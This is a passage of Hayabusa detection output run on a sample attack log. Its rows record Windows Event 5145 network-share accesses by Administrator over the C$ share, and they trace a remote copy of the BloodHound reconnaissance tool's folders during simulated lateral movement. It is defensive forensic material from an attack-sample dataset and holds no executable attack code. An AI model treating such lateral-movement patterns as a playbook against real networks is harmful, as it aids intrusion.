Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
